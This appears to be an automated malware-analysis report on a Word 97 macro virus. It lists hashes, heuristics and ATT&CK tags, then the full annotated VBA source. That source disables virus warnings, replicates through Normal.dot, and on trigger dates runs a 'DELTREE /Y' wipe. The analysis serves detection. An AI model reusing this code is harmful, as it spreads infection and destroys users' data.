Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92c441f7c42f4c30…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 30.0 KB
Created: 1998-07-24 08:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: eeb02966111b92eb60e7e59b18f372cd
SHA-1: a17c00f17a2a15ba8bca58060893a80333ec90a7
SHA-256: 92c441f7c42f4c30c1adc03db8be766e72c38c3f4efc5abe9748165113b531ce
Risk score: 300

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious OLE document containing a VBA macro with an AutoClose subroutine. This subroutine uses the Shell function to execute a payload, as indicated by multiple critical heuristic firings. The macro also contains obfuscated strings and attempts to disable virus protection, suggesting downloader or dropper functionality.

Heuristics (6)

  • ClamAV: Doc.Trojan.Encr-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Encr-1
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7460 bytes
SHA-256: b7bd720580e4fa8942332fefc4f4dd5d65695d61c20972137e52c0f139e4dad4
Detection: ClamAV: Doc.Trojan.Encr-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
' Module stream 1, "ThisDocument": attributes only, no executable code.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module stream 2, "Xute": all of the logic lives here.
' The four constants are single-byte XOR obfuscated with key 25 (see encr below). Decoded:
'   ID_VIR  -> "Xute"            (the module's own name, used to locate copies of itself)
'   DIR_VIR -> "C:\XUTE.DAT"     (temporary export file used during replication)
'   FX_VIR  -> "DELTREE /Y \*.*" (destructive DOS command handed to Shell on the trigger date)
'   GREETS  -> "Kutrex by Xute"  (text shown in the MsgBox)
Attribute VB_Name = "Xute"
Const ID_VIR = "Alm|"
Const DIR_VIR = "Z#EALM\7]XM"
Const FX_VIR = "]\UMK\\96@9E373"
Const GREETS = "Rlmk|a9{`9Alm|"

' XOR decoder: every character of s is XORed with the key k.
Private Function encr(s, k As Integer)
    Dim r
    r = ""
    For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next
    encr = r
End Function

' Auto-exec entry point: runs whenever the document is closed.
Sub AutoClose()
    Dim IsInDoc, IsInTem As Boolean
    Dim InDoc, InTem As Integer
    Dim iDay, iMon As Integer
    Dim DatFx As String
    On Error GoTo Done
    IsInTem = False
    IsInDoc = False
    InDoc = 0
    InTem = 0
    ' Silence Word: turn off the macro virus warning, template save prompt and alerts.
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    ' Date$ is MM-DD-YYYY. Payload fires on 26 July or on any date where day + month = 30.
    DatFx = Date$
    iDay = Val(Mid$(DatFx, 4, 2)): iMon = Val(Mid$(DatFx, 1, 2))
    If (iMon = 7 And iDay = 26) Or (iDay + iMon) = 30 Then
        DatFx = encr(FX_VIR, 25)
        Shell DatFx, 0
        MsgBox "wow" & encr(GREETS, 25)
    End If
    
    ' Replication: look for a module named "Xute" in the active document and in Normal.dot.
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
            IsInDoc = True
            InDoc = i
        End If
    Next
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
            IsInTem = True
            InTem = i
        End If
    Next
    ' Not yet in the global template: export the module from the document and import it into Normal.dot.
    If Not IsInTem Then
        ActiveDocument.VBProject.VBComponents(InDoc).Export encr(DIR_VIR, 25)
        NormalTemplate.VBProject.VBComponents.Import encr(DIR_VIR, 25)
        NormalTemplate.Save
    End If
    ' Not in the document (and it has unsaved changes): copy the module from Normal.dot into the document and save.
    If Not IsInDoc And ActiveDocument.Saved = False Then
        NormalTemplate.VBProject.VBComponents(InTem).Export encr(DIR_VIR, 25)
        ActiveDocument.VBProject.VBComponents.Import encr(DIR_VIR, 25)
        ActiveDocument.Save
    End If
    Kill encr(DIR_VIR, 25)  ' delete the temporary export file
Done:
    Application.ScreenUpdating = True
    Application.DisplayAlerts = wdAlertsAll
End Sub

' Processing file: /opt/analyzer/scan_staging/76ff83551cfa41aeaf23966ae51b13fe.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Xute - 3916 bytes
' Line #0:
' 	Dim (Const) 
' 	LitStr 0x0004 "Alm|"
' 	VarDefn ID_VIR
' Line #1:
' 	Dim (Const) 
' 	LitStr 0x000B "Z#EALM\7]XM"
' 	VarDefn DIR_VIR
' Line #2:
' 	Dim (Const) 
' 	LitStr 0x000F "]\UMK\\96@9E373"
' 	VarDefn FX_VIR
' Line #3:
' 	Dim (Const) 
' 	LitStr 0x000E "Rlmk|a9{`9Alm|"
' 	VarDefn GREETS
' Line #4:
' Line #5:
' 	FuncDefn (Private Function encr(s, k As Integer))
' Line #6:
' 	Dim 
' 	VarDefn r
' Line #7:
' 	LitStr 0x0000 ""
' 	St r 
' Line #8:
' 	StartForVariable 
' 	Ld False 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld s 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld r 
' 	Ld s 
' 	Ld False 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Paren 
' 	Ld k 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' Line #9:
' 	Ld r 
' 	St encr 
' Line #10:
' 	EndFunc 
' Line #11:
' Line #12:
' 	FuncDefn (Sub AutoClose())
' Line #13:
' 	Dim 
' 	VarDefn IsInDoc
' 	VarDefn IsInTem (As Boolean)
' Line #14:
' 	Dim 
' 	VarDefn InDoc
' 	VarDefn InTem (As Integer)
' Line #15:
' 	Dim 
' 	VarDefn iDay
' 	VarDefn iMon (As Integer)
' Line #16:
' 	Dim 
' 	VarDefn DatFx (As String)
' Line #17:
' 	OnError Done 
' Line #18:
' 	LitVarSpecial (False)
' 	St IsInTem 
' Line #19:
' 	LitVarSpecial (False)
' 	St IsInDoc 
' Line #20:
' 	LitDI2 0x0000 
' 	St InDoc 
' Line #21:
' 	LitDI2 0x0000 
' 	St InTem 
' Line #22:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #23:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #24:
' 	LitVa
... (truncated)